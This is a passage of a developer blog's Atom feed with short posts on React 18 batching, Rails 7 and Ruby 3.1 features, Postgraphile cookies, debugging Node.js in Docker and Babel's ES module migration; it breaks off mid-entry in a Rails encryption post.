      <content type="html"><![CDATA[<p>Earlier versions of React batched multiple state updates only inside React event handlers like <code>click</code> or <code>change</code> to avoid multiple re-renders and improve performance.</p><p>React 18 adds automatic batching for all use cases to improve performance even further. Now, React batches state updates in React event handlers, promises, setTimeout, native event handlers and so on.</p><p>Let's jump into an example to understand different use cases of batching.</p><p>In these examples we are assuming that you have already replaced <code>render</code> with the <code>createRoot</code> API. Automatic batching only works with the <code>createRoot</code> API. Please check <a href="https://github.com/reactwg/react-18/discussions/5">this discussion</a> to learn more about replacing <code>render</code> with <code>createRoot</code>.</p><p>We're using the simplest example, also used in the <a href="https://github.com/reactwg/react-18/discussions/21">original discussion</a> of this change.</p><h3>React event handlers</h3><pre><code class="language-jsx">const App = () =&gt; {
  const [count, setCount] = useState(0);
  const [flag, setFlag] = useState(false);

  const handleClick = () =&gt; {
    setCount(count + 1);
    setFlag(!flag);
  };

  return (
    &lt;div&gt;
      &lt;button onClick={handleClick}&gt;Click here!&lt;/button&gt;
      &lt;h1&gt;{count}&lt;/h1&gt;
      &lt;h1&gt;{`${flag}`}&lt;/h1&gt;
    &lt;/div&gt;
  );
};</code></pre><p>Note - React automatically batched all state updates inside event handlers even in previous versions.</p><h3>After fetch call</h3><pre><code class="language-jsx">const handleClick = () =&gt; {
  fetch(&quot;URL&quot;).then(() =&gt; {
    setCount(count + 1);
    setFlag(!flag);
  });
};</code></pre><h3>In <code>setTimeout</code></h3><pre><code class="language-jsx">const handleClick = () =&gt; {
  setTimeout(() =&gt; {
    setCount(count + 1);
    setFlag(!flag);
  }, 1000);
};</code></pre><h3>Native event handlers</h3><pre><code class="language-jsx">const el = document.getElementById(&quot;button&quot;);

el.addEventListener(&quot;click&quot;, () =&gt; {
  setCount(count + 1);
  setFlag(!flag);
});</code></pre><p>In each of the above cases, both state update calls will be batched by React and performed together at once. This avoids re-rendering the component with partially updated state after any event.</p><p>In some cases, where we do not wish to batch state updates, we can use the <code>flushSync</code> API from <code>react-dom</code>. This is mostly useful when one updated state is required before updating another state.</p><pre><code class="language-jsx">import { flushSync } from &quot;react-dom&quot;;

const handleClick = () =&gt; {
  flushSync(() =&gt; {
    setCount(count + 1);
  });
  flushSync(() =&gt; {
    setFlag(!flag);
  });
};</code></pre><p><code>flushSync</code> can be used to fix breaking changes when upgrading to React 18. There is a chance that in earlier versions of React we were using one updated state before updating other states. A simple solution is to wrap all such state updates inside individual <code>flushSync</code> calls.</p><p>For more detailed information on automatic batching, head to <a href="https://github.com/reactwg/react-18/discussions/21">this discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 deprecates Enumerable#sum and Array#sum]]></title>
       <author><name>Aashish Saini</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-deprecates-enumerable-sum-and-array-sum"/>
      <updated>2021-06-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-deprecates-enumerable-sum-and-array-sum</id>
      <content type="html"><![CDATA[<p>Rails 7 deprecates <code>Enumerable#sum</code> for calls with non-numeric arguments. To avoid the warning, we should pass a suitable initial argument.</p><p>Before Rails 7</p><pre><code class="language-ruby">=&gt; %w[foo bar].sum
=&gt; &quot;foobar&quot;

=&gt; [[1, 2], [3, 4, 5]].sum
=&gt; [1, 2, 3, 4, 5]</code></pre><p>After Rails 7</p><pre><code class="language-ruby">=&gt; %w[foo bar].sum
=&gt; Rails 7.0 has deprecated Enumerable.sum in favor of Ruby's native implementation available since 2.4.
   Sum of non-numeric elements requires an initial argument.

=&gt; [[1, 2], [3, 4, 5]].sum
=&gt; Rails 7.0 has deprecated Enumerable.sum in favor of Ruby's native implementation available since 2.4.
   Sum of non-numeric elements requires an initial argument.</code></pre><p>To avoid the deprecation warning, we should pass a suitable initial argument as shown below.</p><pre><code class="language-ruby">=&gt; %w[foo bar].sum('')
=&gt; &quot;foobar&quot;

=&gt; [[1, 2], [3, 4, 5]].sum([])
=&gt; [1, 2, 3, 4, 5]</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/42080">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds method calls for nested secrets]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-method-calls-for-nested-secrets"/>
      <updated>2021-06-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-method-calls-for-nested-secrets</id>
      <content type="html"><![CDATA[<p>Rails stores secrets in <code>config/credentials.yml.enc</code>, which is encrypted and cannot be edited directly. You can read more about credentials management here: <a href="https://guides.rubyonrails.org/security.html#custom-credentials">Rails security guide</a>.</p><p>Rails 7 allows access to nested encrypted secrets (credentials) by method calls. We can easily access the nested secrets present in the credentials YAML file just like we've accessed top-level secrets previously:</p><pre><code class="language-YAML"># config/credentials.yml.enc
secret_key_base: &quot;47327396e32dc8ac825760bb31f079225c5c0&quot;

aws:
  access_key_id: &quot;A6AMOGVNQKCWLNQ&quot;
  secret_access_key: &quot;jfm6b9530tPu/h8v93W4TkUJN+b/ZMKkG&quot;</code></pre><pre><code class="language-ruby">=&gt; Rails.application.credentials.aws
=&gt; {:access_key_id=&gt;&quot;A6AMOGVNQKCWLNQ&quot;, :secret_access_key=&gt;&quot;jfm6b9530tPu/h8v93W4TkUJN+b/ZMKkG&quot;}</code></pre><p>Before Rails 7</p><pre><code class="language-ruby">=&gt; Rails.application.credentials.aws[:access_key_id]
=&gt; &quot;A6AMOGVNQKCWLNQ&quot;

=&gt; Rails.application.credentials.aws.access_key_id
=&gt; NoMethodError (undefined method `access_key_id' for #&lt;Hash:0x00007fb1adb0cca8&gt;)</code></pre><p>After Rails 7</p><pre><code class="language-ruby">=&gt; Rails.application.credentials.aws.access_key_id
=&gt; &quot;A6AMOGVNQKCWLNQ&quot;</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/42106">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using Cookies with Postgraphile]]></title>
       <author><name>Agney Menon</name></author>
      <link href="https://www.bigbinary.com/blog/cookies-with-postgraphile"/>
      <updated>2021-06-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/cookies-with-postgraphile</id>
      <content type="html"><![CDATA[<p>This blog details the usage of cookies in a Postgraphile-based application. We will be using Postgraphile with Express for processing the cookies, but any similar library can be used.</p><p>Cookies can be a very safe method for storage on the client side. They can be set as:</p><ul><li>HTTP only: cannot be accessed through client-side JavaScript, protecting them from any third-party client-side scripts or web extensions.</li><li>Secure: The web browser ensures that the cookies are set only on a <em>secure</em> channel.</li><li>Signed: We can sign the content to make sure it isn't changed on the client side.</li><li>Same Site: Make sure that the cookie is sent only if the site matches your domain/subdomain (<a href="https://web.dev/samesite-cookies-explained/">details</a>)</li></ul><h2>Prerequisites</h2><ul><li>Postgraphile - Generates an instant GraphQL API from a Postgres database</li><li>Express - Minimalistic backend framework for NodeJS</li></ul><h2>Setup</h2><p>We will start off with a base Express setup generated with <a href="https://expressjs.com/en/starter/generator.html">express-generator</a>.</p><pre><code class="language-javascript">const createError = require(&quot;http-errors&quot;);
const express = require(&quot;express&quot;);
const path = require(&quot;path&quot;);
const cookieParser = require(&quot;cookie-parser&quot;);
const logger = require(&quot;morgan&quot;);

const app = express();
require(&quot;dotenv&quot;).config();

app.use(logger(&quot;dev&quot;));
app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, &quot;public&quot;)));

// Use secret key to sign the cookies on creation and parsing
app.use(cookieParser(process.env.SECRET_KEY));

// Catch 404 and forward to error handler
app.use(function (req, res, next) {
  next(createError(404));
});

// Error handler
app.use(function (err, req, res) {
  // Set locals, only providing error in development
  res.locals.message = err.message;
  res.locals.error = req.app.get(&quot;env&quot;) === &quot;development&quot; ? err : {};

  // Render the error page
  res.status(err.status || 500);
  res.render(&quot;error&quot;);
});

module.exports = app;</code></pre><p>From <a href="https://www.graphile.org/postgraphile/usage-library/">Postgraphile's usage library page</a>, for adding Postgraphile to an Express app:</p><pre><code class="language-javascript">app.use(
  postgraphile(
    process.env.DATABASE_URL || &quot;postgres://user:pass@host:5432/dbname&quot;,
    &quot;public&quot;,
    {
      watchPg: true,
      graphiql: true,
      enhanceGraphiql: true,
    }
  )
);</code></pre><p>Now for the table setup. We need a private <code>user_accounts</code> table and a method named <code>authenticate_user</code> that will return a JWT token of the form:</p><pre><code>{
  token: 'jwt_token_here',
  username: '',
  ...anyOtherDetails
}</code></pre><p>We will not be detailing table creation or authentication as there are many ways to go about it. But if you need help, <a href="https://www.graphile.org/postgraphile/security/">Postgraphile security</a> is the page to rely on.</p><h2>Adding the Plugin library</h2><p>To attach a cookie to the request, we will use the <code>@graphile/operation-hooks</code> library, which is open-sourced <a href="https://github.com/graphile/operation-hooks">on GitHub</a>.</p><pre><code class="language-bash">npm install @graphile/operation-hooks
# OR
yarn add @graphile/operation-hooks</code></pre><p>To add the library to the app:</p><pre><code class="language-javascript">const { postgraphile, makePluginHook } = require(&quot;postgraphile&quot;);

const pluginHook = makePluginHook([
  require(&quot;@graphile/operation-hooks&quot;).default,
  // Any more PostGraphile server plugins here
]);

app.use(
  postgraphile(
    process.env.DATABASE_URL || &quot;postgres://user:pass@host:5432/dbname&quot;,
    &quot;public&quot;,
    {
      watchPg: true,
      graphiql: true,
      enhanceGraphiql: true,
      pluginHook,
      appendPlugins: [
        // You will be adding the hooks here
      ],
    }
  )
);</code></pre><h2>Adding the Plugin</h2><p>The plugin allows for two different types of hooks:</p><ol><li><a href="https://github.com/graphile/operation-hooks#sql-hooks">SQL Hooks</a></li><li><a href="https://github.com/graphile/operation-hooks#implementing-operation-hooks-in-javascript">JavaScript Hooks</a></li></ol><p>Since accessing cookies is a JavaScript operation, we will be concentrating on the second type.</p><p>To hook the plugin into the build system, we can use the <code>addOperationHook</code> method.</p><pre><code class="language-javascript">module.exports = function OperationHookPlugin(builder) {
  builder.hook(&quot;init&quot;, (_, build) =&gt; {
    // Register our operation hook (passing it the build object):
    // useAuthCredentials is a function we will define later.
    build.addOperationHook(useAuthCredentials(build));

    // Graphile Engine hooks must always return their input or a derivative of
    // it.
    return _;
  });
};</code></pre><p>If this is contained in a file named <code>set-auth-cookie.js</code>, then the plugin can be added to the append plugins array as follows:</p><pre><code class="language-javascript">{
  appendPlugins: [
    require('./set-auth-cookie.js'),
  ],
}</code></pre><h2>Designing the hook</h2><p>The function to be executed receives two arguments: the <code>build</code> object and the current <code>fieldContext</code>.</p><p>The <code>fieldContext</code> consists of fields that can be used to narrow down the mutation or query that we want to target; e.g. if the hook is to run only on mutations, we can use the <code>fieldContext.isRootMutation</code> field.</p><pre><code class="language-javascript">const useAuthCredentials = build =&gt; fieldContext =&gt; {
  const { isRootMutation } = fieldContext;

  if (!isRootMutation) {
    // No hook added here
    return null;
  }
};</code></pre><p>To direct the system on usage of the plugin, we have to return an object with <code>before</code>, <code>after</code> or <code>error</code> fields. Here is how these keywords can be used:</p><p>(comments are from <a href="https://github.com/graphile/operation-hooks-example/blob/master/hooks/logger.js">the example repository</a>)</p><pre><code class="language-javascript">return {
  // An optional list of callbacks to call before the operation
  before: [
    // You may register more than one callback if you wish. They will be mixed
    // in with the callbacks registered from other plugins and called in the
    // order specified by their priority value.
    {
      // Priority is a number between 0 and 1000. If you're not sure where to
      // put it, then 500 is a great starting point.
      priority: 500,
      // This function (which can be asynchronous) will be called before the
      // operation. It will be passed a value that it must return verbatim. The
      // only other valid return is `null` in which case an error will be
      // thrown.
      callback: logAttempt,
    },
  ],
  // As `before`, except the callback is called after the operation and will be
  // passed the result of the operation; you may return a derivative of the
  // result.
  after: [],
  // As `before`; except the callback is called if an error occurs; it will be
  // passed the error and must return either the error or a derivative of it.
  error: [],
};</code></pre><p>Since we want our action to happen after we get the result from the mutation, we will add it to the <code>after</code> array.</p><pre><code class="language-javascript">const useAuthCredentials = build =&gt; fieldContext =&gt; {
  const { isRootMutation, pgFieldIntrospection } = fieldContext;

  if (!isRootMutation) {
    // No hook added here
    return null;
  }

  if (
    !pgFieldIntrospection ||
    // Name of the mutation is authenticateUser
    pgFieldIntrospection.name !== &quot;authenticateUser&quot;
  ) {
    // narrowing the scope down to the mutation we want
    return null;
  }

  return {
    before: [],
    after: [
      {
        priority: 1000,
        callback: (result, args, context) =&gt; {
          // The result is here, so we can access accessToken and username.
          console.log(result);
        },
      },
    ],
    error: [],
  };
};</code></pre><p>Since the functionality is inside the plugin hook, we do not have the Express response object available to set the cookie.</p><p>But we do have an escape hatch with the third argument: <code>context</code>. Postgraphile allows us to pass functions or values into the context variable from the postgraphile instance.</p><pre><code class="language-javascript">app.use(
  postgraphile(process.env.DATABASE_URL, &quot;public&quot;, {
    async additionalGraphQLContextFromRequest(req, res) {
      return {
        // Function to set the cookie passed into the context object
        setAuthCookie: function (authCreds) {
          res.cookie(&quot;app_creds&quot;, authCreds, {
            signed: true,
            httpOnly: true,
            secure: true,
            // Check if you want to include SameSite cookies here, depending on your hosting.
          });
        },
      };
    },
  })
);</code></pre><p>We can now set the cookie inside the plugin hook.</p><pre><code class="language-javascript">{
  priority: 1000,
  callback: (result, args, context) =&gt; {
    // This function is passed from additionalGraphQLContextFromRequest as
    // detailed in the snippet above
    context.setAuthCookie(result);
  }
}</code></pre><h2>Reading from the Cookie</h2><p>We have already added the <code>cookieParser</code> with <code>SECRET_KEY</code>, so Express will parse the cookies for us.</p><p>But we probably want them to be accessible inside SQL functions for Postgraphile. That is how we can determine if the user is signed in or what their permissions are. To do that, Postgraphile provides a <code>pgSettings</code> object.</p><pre><code class="language-javascript">app.use(
  postgraphile(process.env.DATABASE_URL, &quot;public&quot;, {
    pgSettings: async req =&gt; ({
      user: req.signedCookies[&quot;app_creds&quot;],
    }),
  })
);</code></pre><p>Inside an SQL function, the variables passed from settings can be accessed like this:</p><pre><code class="language-sql">current_setting('user')</code></pre><hr><p>That's all. We can store any details in cookies, retrieve them on the Express end and use them inside Postgres functions for authentication or authorization.</p><p>Check out the <a href="https://github.com/graphile/operation-hooks">operation-hooks</a> plugin for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Debug Node.js app running in a Docker container]]></title>
       <author><name>Preveen Raj</name></author>
      <link href="https://www.bigbinary.com/blog/debug-nodejs-app-running-in-a-docker-container"/>
      <updated>2021-05-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/debug-nodejs-app-running-in-a-docker-container</id>
      <content type="html"><![CDATA[<p>A Docker container is a standard unit of software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another. Anyone who has dealt with one would have wanted to debug their application like they normally do, but it often feels difficult to configure. Let's do it in a simple way.</p><h3>1. Install <a href="https://marketplace.visualstudio.com/items?itemName=ms-azuretools.vscode-docker">Docker Extension</a> for VSCode</h3><p><img width="1791" alt="VSCode_Docker_Extension" src="/blog_images/2021/debug-nodejs-app-running-in-a-docker-container/vscode_docker_extension.png"></p><p>This extension enables VSCode to debug an app inside the Docker container. It will also enable us to manage Docker images and containers.</p><h3>2. Expose port 9229 in the docker-compose.yml</h3><p>Port <code>9229</code> is the default Node.js debugging port.</p><p>This will bind the port of the container with that of the host machine, enabling the VSCode debugger to attach to the port.</p><pre><code class="language-yml">version: &quot;3.9&quot;
services:
  backend:
    container_name: nodejs
    restart: always
    build:
      context: .
    ports:
      - &quot;80:3000&quot;
      - &quot;5678:5678&quot;
      - &quot;9229:9229&quot;
    command: yarn dev</code></pre><h5>OR</h5><blockquote><p>If you are directly running the app from the command line, then you can append <code>-p 9229:9229</code> to the docker-run command. Example:</p></blockquote><pre><code class="language-bash">docker run -d -p 80:3000 -p 9229:9229 node:15.0.1-alpine</code></pre><h3>3. Add the inspect switch to the npm script</h3><pre><code class="language-bash">nodemon --inspect=0.0.0.0:9229 --watch server server/bin/www</code></pre><p>Make sure you add the address and port to the inspect switch.
When started with the <code>--inspect</code> switch, a Node.js process listens for a debugging client. By default, it will listen at host and port <code>127.0.0.1:9229</code>. For Docker, we have to update it to <code>0.0.0.0:9229</code>.</p><h3>4. Create a VSCode launch.json</h3><p>You can generate a <code>launch.json</code> from the Debug tab of VSCode. Click on the dropdown and select <strong>Add Configuration</strong>.</p><p><img width="381" alt="VSCode_Debugger" src="/blog_images/2021/debug-nodejs-app-running-in-a-docker-container/vscode_debugger.png"></p><p>This action generates a default JSON configuration. Replace the content with the below:</p><pre><code class="language-JSON">{
  &quot;version&quot;: &quot;0.2.0&quot;,
  &quot;configurations&quot;: [
    {
      &quot;name&quot;: &quot;Docker: Attach to Node&quot;,
      &quot;type&quot;: &quot;node&quot;,
      &quot;request&quot;: &quot;attach&quot;,
      &quot;restart&quot;: true,
      &quot;port&quot;: 9229,
      &quot;address&quot;: &quot;localhost&quot;,
      &quot;localRoot&quot;: &quot;${workspaceFolder}&quot;,
      &quot;remoteRoot&quot;: &quot;/usr/src/app&quot;,
      &quot;protocol&quot;: &quot;inspector&quot;
    }
  ]
}</code></pre><h3>5. Start the docker container and attach the debugger.</h3><p>After your Docker container has been successfully launched, you can attach the debugger to it at any time by clicking the play button in the same Debug tab where we built the <code>launch.json</code> configuration.</p><p>VSCode will now adjust the color of its bottom status bar to indicate that it is in debugging mode, and you are ready to go.</p><p>You can put breakpoints anywhere in your file and get your work done faster and better than before.</p><h4>Bonus Tip</h4><blockquote><p>Since the debugger has full access to the Node.js execution environment, a malicious agent who can bind to this port will be able to execute arbitrary code on the Node.js process's behalf.
It is important to understand the security implications of exposing the debugger port on public and private networks. Make sure you are not exposing the debugging port in a production environment.</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Helping Babel move to ES Modules]]></title>
       <author><name>Karan Sapolia Sharma</name></author>
      <link href="https://www.bigbinary.com/blog/helping-babel-move-to-esm"/>
      <updated>2021-05-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/helping-babel-move-to-esm</id>
      <content type="html"><![CDATA[<p>The Babel project recently moved to running builds on Node.js 14, which means that Babel can now use <a href="https://nodejs.org/api/esm.html#esm_modules_ecmascript_modules">ES Modules</a> (ESM) instead of CommonJS (CJS) to import/export modules in internal scripts.</p><p>Also, with the upcoming Babel 8.0.0 release, the team is aiming to <a href="https://github.com/babel/babel/issues/11701">ship Babel as native ES Modules</a>. With this goal in mind, the team is shifting all CommonJS imports/exports to ESM ones. This is where I got the opportunity to contribute to Babel recently.</p><h2>Why ES Modules though?</h2><p>For a very long time, JS (or ECMAScript) did not have a standardized module import/export syntax. Various independent packages introduced formats to help work with modules in JS. Most browsers used the AMD API (Asynchronous Module Definition) implemented in the Require.js package, which had its own syntax and quirks.</p><p>CommonJS, on the other hand, was the standard used by Node.js, and it was no less quirky. Inconsistent formatting and <a href="https://nodejs.org/api/esm.html#esm_interoperability_with_commonjs">poor interoperability between packages</a> irked JS developers enough to demand a standard format.</p><p>Lately, the ECMAScript standardization body (TC39) has adopted ESM (ECMAScript modules) as the standard module format for JavaScript. Most web browsers already support this format, and Node.js 14 now provides <a href="https://nodejs.org/api/esm.html#esm_modules_ecmascript_modules">stable support for it</a>.</p><h2>The task at hand</h2><p>The next task was to convert all internal top-level scripts from using CommonJS to ESM. The finer details of the implementation, along with interoperability issues with non-ESM files, would keep CommonJS around for some time though.</p><p>The simplest of the changes was to replace <code>require()</code> statements in each file with <code>import</code> statements.
For example, files starting like:</p><pre><code class="language-javascript">&quot;use strict&quot;;const plumber = require(&quot;gulp-plumber&quot;);const through = require(&quot;through2&quot;);const chalk = require(&quot;chalk&quot;);</code></pre><p>would be modified like here:</p><pre><code class="language-javascript">import plumber from &quot;gulp-plumber&quot;;import through from &quot;through2&quot;;import chalk from &quot;chalk&quot;;</code></pre><p>to allow modules to be imported as ES modules.</p><p>In the above example also note that because ES modules are in strict mode bydefault, so <code>&quot;use strict&quot;;</code> declarations were removed from the beginning ofthese top-level scripts.</p><p>Almost all current NPM packages are CommonJS packages, exposing theirfunctionalities using the <code>module.exports</code> syntax.</p><p>In case a file/package exports more than one value, we need to use named importsinstead:</p><pre><code class="language-javascript">import { chalk } from &quot;chalk&quot;;</code></pre><p>Where the default export object from a CommonJS module was named differently, ithad to be aliased during import to avoid breaking pre-existing variables' namesin the files being converted to ESM. 
For example,</p><pre><code class="language-javascript">const rollupBabel = require(&quot;@rollup/plugin-babel&quot;).default;</code></pre><p>had to be replaced with:</p><pre><code class="language-javascript">import { babel as rollupBabel } from &quot;@rollup/plugin-babel&quot;;</code></pre><p>so we could keep using the variable <code>rollupBabel</code> in the file.</p><p>For instances where <code>require()</code> statements needed to be replaced by the dynamic<code>import()</code> statements</p><pre><code class="language-javascript">const getPackageJson = (pkg) =&gt; require(join(packageDir, pkg, &quot;package.json&quot;));// replaced byconst getPackageJson = (pkg) =&gt; import(join(packageDir, pkg, &quot;package.json&quot;));</code></pre><p>the subsequent calls everywhere now needed to be awaited:</p><pre><code class="language-javascript">   .forEach(id =&gt; {      const { name, description } = getPackageJson(id);   })   //await added   .forEach(id =&gt; {      const { name, description } = await getPackageJson(id);   })</code></pre><p>Other things like importing JSON modules are currently only supported inCommonJS mode.<a href="https://nodejs.org/api/esm.html#esm_no_json_module_loading">Those imports were left as-is</a>.</p><h2>Blockers</h2><p>With all the changes made and committed, we bumped into the next big roadblock:package dependencies. Babel uses Yarn 2 internally, and particularly the PnPfeature of Yarn 2. Unfortunately, the ESM loader API was experimental at thetime and not being used by PnP. 
The Babel and Yarn teams<a href="https://github.com/babel/babel/pull/12296#discussion_r546301877">coordinated to implement it</a>soon after.</p><p>Similarly, Jest has its own custom loader for ESM, which meant it could notsupport testing ESM modules with Babel.<a href="https://github.com/facebook/jest/issues/9430">That issue</a> was side-stepped forthe time being.</p><h2>Network effects</h2><p>The good thing about the whole grind of shifting from CommonJS to ESM is that alot of other major packages are also considering and implementing ESM support.The shift to ESM-only by Babel is already building confidence in others to dothe same. Special thanks to the Babel maintainers for setting a great exampleand<a href="https://twitter.com/NicoloRibaudo/status/1356030492546650115?s=20">encouraging others to move to ESM</a>.</p><h2>Conclusion</h2><p>All told, it was a great experience adding a new feature into a well-maintainedand widely-used package. The biggest lesson from this has to be how changes madein Babel affect and influence other major packages, and how maintainers ofvarious major open source packages work in tandem to avoid breaking each other'scode. It is a very open and collaborative ecosystem with people discussing andworking through github issues, comments, and even twitter threads.</p><p>Check out the <a href="https://github.com/babel/babel/pull/12296">pull request</a> for moredetails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Failing Gracefully: Error Boundaries in React]]></title>
       <author><name>Dane David</name></author>
      <link href="https://www.bigbinary.com/blog/error-boundaries-in-react"/>
      <updated>2021-05-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/error-boundaries-in-react</id>
      <content type="html"><![CDATA[<p>React 16 introduced the concept of &quot;Error Boundaries&quot; within component trees. Web developers are often confused about its proper application: should the entire app be wrapped in a single error boundary? Or should each component be wrapped in its own error boundary so that individual breakages don't affect the whole app?</p><p>Below is my talk from <a href="https://reactday.in/">React Day Bangalore</a> that aims at figuring out some common patterns and design decisions on when and where to use React error boundaries for a fault-tolerant React application.</p><p>&lt;div class=&quot;youtube-video-container&quot;&gt;&lt;iframe width=&quot;560&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/t5TfkIKUJE4&quot; title=&quot;YouTube video player&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;&lt;/div&gt;</p><h2>Useful links</h2><ul><li><a href="https://drive.google.com/file/d/1e2DXRNBYwRHGPJG0KQWK1DU8neZLXSqm/view">Talk Slides</a></li><li><a href="https://www.reddit.com/r/reactjs/comments/9lp0k3/new_lifecycle_method_getderivedstatefromerror/">New lifecycle method: getDerivedStateFromError [reddit]</a></li><li><a href="https://kentcdodds.com/blog/use-react-error-boundary-to-handle-errors-in-react">react-error-boundary</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3.1 adds Array#intersect?]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-1-adds-array-intersect"/>
      <updated>2021-05-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-1-adds-array-intersect</id>
      <content type="html"><![CDATA[<p>Ruby 3.1 introduces the <code>Array#intersect?</code> method, which returns the boolean value <code>true</code> or <code>false</code> based on whether the given arrays have any elements in common.</p><p>We already know the <a href="https://ruby-doc.org/core-3.0.1/Array.html#method-i-intersection">Array#intersection or Array#&amp;</a> methods, which are used to find the common elements between arrays.</p><pre><code class="language-ruby">=&gt; x = [1, 2, 5, 8]
=&gt; y = [2, 4, 5, 9]
=&gt; z = [3, 7]

=&gt; x.intersection(y) # x &amp; y
=&gt; [2, 5]
=&gt; x.intersection(z) # x &amp; z
=&gt; []</code></pre><p>The <code>intersection</code> or <code>&amp;</code> methods return an empty array, or an array with the common elements in it, as the result. We have to further call methods like <code>empty?</code>, <code>any?</code> or <code>blank?</code> to check whether two arrays intersect each other or not.</p><h2>Before Ruby 3.1</h2><pre><code class="language-ruby">=&gt; x.intersection(y).empty?
=&gt; false
=&gt; (x &amp; z).empty?
=&gt; true
=&gt; (y &amp; z).any?
=&gt; false</code></pre><h2>After Ruby 3.1</h2><pre><code class="language-ruby">=&gt; x.intersect?(y)
=&gt; true
=&gt; y.intersect?(z)
=&gt; false</code></pre><p>The <code>Array#intersect?</code> method accepts only a single array as an argument, but the <code>Array#intersection</code> method can accept multiple arrays as arguments.</p><pre><code class="language-ruby">=&gt; x.intersection(y, z) # x &amp; y &amp; z
=&gt; []</code></pre><p>The newly introduced <code>intersect?</code> method is faster than the above-described checks using <code>intersection</code> or <code>&amp;</code>, since the new method avoids creating an intermediate array while evaluating the common elements. Also, the new method returns <code>true</code> as soon as it finds a common element between the arrays.</p><p>Here's the relevant <a href="https://github.com/ruby/ruby/pull/1972">pull request</a> and <a href="https://bugs.ruby-lang.org/issues/15198">feature discussion</a> for this change.</p>]]></content>
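For readers on Ruby versions older than 3.1, the behavior of `Array#intersect?` can be approximated in plain Ruby. The helper name below is our own illustration, not part of Ruby's API:

```ruby
require "set"

# Portable approximation of Ruby 3.1's Array#intersect? for older Rubies.
# Returns true as soon as a common element is found, without building the
# intermediate array that `a & b` would allocate.
def intersect_any?(a, b)
  lookup = b.to_set # O(1) membership checks
  a.any? { |element| lookup.include?(element) }
end

x = [1, 2, 5, 8]
y = [2, 4, 5, 9]
z = [3, 7]

intersect_any?(x, y) # => true
intersect_any?(x, z) # => false
```

Like the real `intersect?`, `any?` short-circuits on the first match.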
    </entry><entry>
       <title><![CDATA[Rails 7.0 adds encryption to Active Record models]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-encryption-to-active-record"/>
      <updated>2021-05-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-encryption-to-active-record</id>
      <content type="html"><![CDATA[<p>Before Rails 7.0, to add encryption to attributes of ActiveRecord models, we had to use third-party gems like <a href="https://github.com/ankane/lockbox">lockbox</a>, which served the purpose, but at the cost of an additional dependency.</p><p>Before we delve deeper, let's take a look at some terms related to encryption:</p><ol><li><strong>Encrypt:</strong> to scramble a message in a way that only the intended person can extract the original message.</li><li><strong>Decrypt:</strong> to extract the original message from an encrypted one.</li><li><strong>Key:</strong> a string of characters used to encrypt/decrypt a message.</li><li><strong>Cipher:</strong> an algorithm used to encrypt and decrypt a message; RSA, Blowfish, and AES are some well-known examples.</li><li><strong>Deterministic:</strong> a process with guaranteed results; the sum of a set of numbers never changes.</li><li><strong>Non-deterministic:</strong> a process with unpredictable results; a roll of the dice can never be predicted.</li></ol><h3>Rails 7.0</h3><p>Rails 7.0 adds encryption to attributes at the model level. By default, it supports encrypting serialized attribute types using the non-deterministic <code>AES-GCM</code> cipher.</p><p>To use this feature, we have to set the <code>key_derivation_salt</code>, <code>primary_key</code>, and <code>deterministic_key</code> variables in our environment file. These keys can be generated by running <code>bin/rails db:encryption:init</code>.</p><p>Let's enable encryption on the <code>passport_number</code> attribute of the <code>User</code> model.</p><pre><code class="language-ruby"># app/models/user.rb

class User &lt; ApplicationRecord
  encrypts :passport_number
end</code></pre><p>In the above code, we have asked Rails to encrypt the <code>passport_number</code> attribute of the <code>User</code> model when writing it to the database. Now, whenever we create a <code>User</code>, we will see the encrypted value of <code>passport_number</code> in the table, and the unencrypted value when we query using ActiveRecord.</p><pre><code class="language-ruby"># rails console
&gt;&gt; User.create name: &quot;Akhil&quot;, passport_number: &quot;BKLPG564&quot;
  TRANSACTION (0.1ms)  begin transaction
  User Create (0.6ms)  INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;passport_number&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES (?, ?, ?, ?)  [[&quot;name&quot;, &quot;Akhil&quot;], [&quot;passport_number&quot;, &quot;{\&quot;p\&quot;:\&quot;iOUC3ESsyxY=\&quot;,\&quot;h\&quot;:{\&quot;iv\&quot;:\&quot;lDdCxI3LeoPv0hxZ\&quot;,\&quot;at\&quot;:\&quot;D50hElso0YvI6d8Li+l+lw==\&quot;}}&quot;], [&quot;created_at&quot;, &quot;2021-04-15 10:27:50.800729&quot;], [&quot;updated_at&quot;, &quot;2021-04-15 10:27:50.800729&quot;]]
  TRANSACTION (1.5ms)  commit transaction

&gt;&gt; User.last
